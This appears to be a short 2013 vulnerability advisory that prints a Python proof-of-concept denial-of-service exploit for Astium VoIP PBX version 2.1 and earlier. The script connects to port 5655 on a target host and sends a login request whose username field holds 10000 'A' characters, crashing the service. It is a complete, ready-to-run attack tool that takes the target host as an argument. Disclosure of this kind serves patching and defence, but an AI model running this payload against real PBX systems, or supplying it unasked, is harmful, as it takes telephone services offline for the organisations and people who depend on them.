|
|
| |
| Astium VoIP PBX version 2.1 build 25399 remote crash poc Vulnerability |
| |
Credit:
The information has been provided by xistence.
|
| |
Vulnerable Systems:
* Astium VoIP PBX <= v2.1
import socket, sys
port = 5655
payload = "\x41"*10000
print ""
print "[*] Astium VoIP PBX <= v2.1 build 25399 Remote Crash PoC - xistence - xistence[at]0x90[.]nl - 2013-01-02"
print ""
if (len(sys.argv) != 2):
print "[*] Usage: " + sys.argv[0] + " <RHOST>"
print ""
exit(0)
rhost = sys.argv[1]
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((rhost,port))
data = s.recv(1024)
print "[*] %s" %data
print "[*] Sending payload!"
s.send("Action: Login\r\n")
s.send("Username: " + payload + "\r\n")
s.send("Secret: hax0r\r\n")
s.send("\r\n")
s.close()
except:
print "Error!"
Disclosure Timeline:
Published: 2013-01-02
|
|
blog comments powered by
|